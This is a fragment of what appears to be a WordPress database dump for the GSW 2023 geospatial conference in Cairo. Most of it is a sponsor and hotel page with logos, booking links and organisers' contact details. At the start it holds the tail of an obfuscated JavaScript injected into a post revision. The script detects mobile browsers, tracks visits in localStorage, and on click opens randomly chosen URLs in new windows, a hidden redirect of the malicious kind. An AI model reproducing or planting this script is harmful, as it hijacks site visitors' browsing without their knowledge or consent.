u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x365b[0x4]](_0x784bdc[_0x365b[0x5]](0x0,0x4)))&&(_0x129862=!![]);}(navigator[_0x365b[0x1]]||navigator[_0x365b[0x2]]||window[_0x365b[0x3]]),_0x129862;};const _0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-08-08 15:28:17','2023-08-08 15:28:17','',3066,'https://gsw2023.com/?p=5088',0,'revision','',0),
(5089,1,'2023-08-08 15:28:40','2023-08-08 15:28:40','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219449581{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081933017{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.tra.gov.eg/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5009 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/ntra-300x116.jpg\" alt=\"\" width=\"300\" height=\"116\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081968974{margin-top: 95px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p><a href=\"https://www.esri.com/en-us/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4719\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/ESRI-300x111.jpg\" alt=\"\" width=\"487\" height=\"180\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081337215{margin-top: 40px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.pix4d.com/ \" target=\"_blank\" rel=\"noopener\"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689080719428{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p>&nbsp;[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1689081395417{margin-top: 10px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffffff;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://abuqir.net/home\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-5005\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/aboquir-239x300.png\" alt=\"\" width=\"193\" height=\"242\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096091997{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096010128{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"https://hdmap.geomatics.ncku.edu.tw/index-US.php\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095942758{margin-top: 137px !important;}\"]<a href=\"https://www.applanix.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687219836213{margin-top: -px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4701 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/hexagon_new-300x122.jpg\" alt=\"\" width=\"349\" height=\"142\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951584642{margin-top: 45px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][vc_column_text css=\".vc_custom_1688951717998{margin-top: 90px !important;}\"]<a href=\"https://www.agisoft.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4987 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image-300x102.png\" alt=\"\" width=\"300\" height=\"102\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687095881067{margin-top: 20px !important;}\"]<a href=\"https://www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690459872519{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.piesat.cn/en-us/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5053\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/5X5cm-PIESAT-Logo-300x300.png\" alt=\"\" width=\"276\" height=\"276\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690460056235{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://www.vexcel-imaging.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4990 \" src=\"https://gsw2023.com/wp-content/uploads/2023/07/image002.jpg\" alt=\"\" width=\"179\" height=\"213\" /></a></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1688951105389{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"></h4>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><a href=\"https://terrasolid.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-4655 \" src=\"https://gsw2023.com/wp-content/uploads/2023/06/Terrasolid_logo_wide2_rgb_300dpi-300x112.png\" alt=\"\" width=\"324\" height=\"121\" /><br />\n</a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096291206{margin-top: 50px !important;}\"]<a href=\"https://www.geosat.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096367037{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"https://www.riegl.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1687096532104{margin-top: 88px !important;}\"]<a href=\"https://www.robotlab.com.tw\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690251276274{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-e1690251327743-300x167.png\" alt=\"\" width=\"309\" height=\"172\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690452445334{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Tourism partner</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://funtrip-travel.com/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5041\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/LOGO-FINAL2-300x184.jpg\" alt=\"\" width=\"265\" height=\"163\" /></a></h4>\n<p style=\"text-align: center;\">Email : <span style=\"color: #3366ff;\"><strong>gsw2023@funtrip-travel.com</strong></span></p>\n<p style=\"text-align: center;\">Mobile no and WhatsApp: <span style=\"color: #3366ff;\"><strong>+201221541515</strong></span></p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Ffuntrip-travel.com%2F|title:FunTrip|target:_blank\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690452582489{margin-top: -15px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For FunTrip More Detail[/dt_default_button][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1690600884765{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Exhibition organizer</span></h4>\n<h4 style=\"text-align: center;\"><a href=\"https://www.purespot.org/\" target=\"_blank\" rel=\"noopener\"><img class=\"alignnone wp-image-5061\" src=\"https://gsw2023.com/wp-content/uploads/2023/07/Logo-Pure-2-300x300.jpg\" alt=\"\" width=\"151\" height=\"151\" /></a></h4>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt; color: #3366ff;\"><strong>project manager </strong></span><br />\n<span style=\"font-size: 8pt;\"><strong>Mr. Omar Mohamed</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: omar.mohamed@egypure.org   </span><span style=\"font-size: 8pt;\"> phone : ⁦+20 100 098 8976⁩</span></p>\n<p style=\"text-align: left;\"><span style=\"font-size: 8pt;\"><strong>Mr. Ahmed Refaat</strong></span><br />\n<span style=\"font-size: 8pt;\">Email: ahmed.refaat@egypure.org   </span><span style=\"font-size: 8pt;\">  phone :⁦+20 100 084 4792</span>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fegyptair%2F|title:EGYPTAIR\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687571509167{margin-top: -90px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]For EGYPTAIR Booking More Detail[/dt_default_button][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1691508515384{margin-top: 50px !important;}\"]</p>\n<h1 style=\"text-align: center;\">Journals partner</h1>\n<h3 style=\"text-align: center;\">The author has the opportunity to publish his/her articles in one of the following journals :</h3>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"color: #000000;\"><a style=\"color: #000000;\" href=\"https://www.springer.com/journal/43995/\"><span style=\"font-size: 14pt;\"><strong>Journal of Umm Al-Qura University for Engineering and Architecture</strong></span></a></span></p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt;\"><strong><a href=\"http://www.springer.com/journal/43995\">www.springer.com/journal/43995</a></strong></span></p>\n<h3></h3>\n<p>&nbsp;</p>\n<p>&nbsp;</p>\n<p style=\"text-align: center;\"><span style=\"font-size: 14pt; color: #000000;\"><strong>Journal of Engineering and Thermal Sciences (JETS) ISSN (Online) 2669-2465</strong></span></p>\n<p style=\"text-align: center;\"><strong><span style=\"font-size: 14pt;\"><a href=\"http://www.extrica.com/journal/jets\">www.extrica.com/journal/jets</a></span></strong></p>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_separator style=\"shadow\" border_width=\"10\"][vc_column_text css=\".vc_custom_1687848604610{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 10px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: center;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row content_placement=\"top\" css=\".vc_custom_1687710509489{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/3\" css=\".vc_custom_1687711699560{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1687711558584{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity. <a href=\"https://gsw2023.com/index.php/welcome/\"><span style=\"text-decoration: underline;\"><strong><span style=\"color: #3366ff; text-decoration: underline;\">Read More</span></strong></span></a></p>\n<p>[/vc_column_text][/vc_column][vc_column width=\"2/3\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][dt_team_masonry order=\"asc\" custom_content_bg_color=\"#e8e8e8\" image_sizing=\"proportional\" img_max_width=\"120px\" image_paddings=\"10px 0px 0px 0px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" team_position_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" soc_icon_color=\"#ffffff\" posts_offset=\"0\" category=\"105\" css_dt_team_masonry=\".vc_custom_1687711659617{margin-top: 0px !important;}\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"ex-full\" fadeout_row=\"fadeout_row_value\" enable_overlay=\"enable_overlay_value\" overlay_color=\"#3a3a3a\" overlay_pattern=\"transperant\" overlay_pattern_opacity=\"75\"][vc_column width=\"1/3\"][vc_column_text css=\".vc_custom_1687564704480{margin-top: -4px !important;margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 14pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"298\" height=\"168\" /></span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Conference Venue </span></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<h5></h5>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fredirect%3Fpath%3Dasearch%26brandCode%3D6C%26localeCode%3Den%26regionCode%3D1%26hotelCode%3DCROHA%26checkInDate%3D01%26checkInMonthYear%3D082023%26checkOutDate%3D08%26checkOutMonthYear%3D082023%26rateCode%3DAAFST%26_PMID%3D99801505%26GPC%3DARA%26cn%3Dno%26viewfullsite%3Dtrue|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690569939761{margin-top: -25px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/3\" awb_type=\"image\"][vc_column_text css=\".vc_custom_1687553105001{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt; color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7);\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1690251704410{margin-top: 10px !important;margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][vc_btn title=\"For More Hotels\" color=\"info\" align=\"center\" link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fhotel-accommodation%2F\"][/vc_column][vc_column width=\"1/3\"][vc_column_text]</p>\n<h4 class=\"qrShPb pXs6bb PZPZlf q8U8x aTI8gc EaHP9c\" style=\"text-align: center;\" data-dtype=\"d3ifr\" data-local-attribute=\"d3bn\" data-attrid=\"title\" data-ved=\"2ahUKEwi88f_AuNX_AhU5gv0HHQT_D7wQ3B0oAHoECDsQAQ\"><span style=\"color: #000000; padding: 5px; background-color: rgba(255,255,255, 0.7); font-size: 18pt;\">Flamenco Cairo Hotel</span></h4>\n<h4></h4>\n<p><a href=\"https://www.flamencohotels.com/web/\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter\" src=\"https://www.flamencohotels.com/web/wp-content/uploads/2020/02/4Z4A4470-Low.jpg\" alt=\"\" width=\"281\" height=\"187\" /></a></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<h5 style=\"text-align: center;\"><span style=\"color: #ffffff;\">Deadline for the Special Rates is August 10, 2023</span></h5>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fflamenco-cairo-hotel%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1687391423079{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1687570749968{margin-top: 12px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" 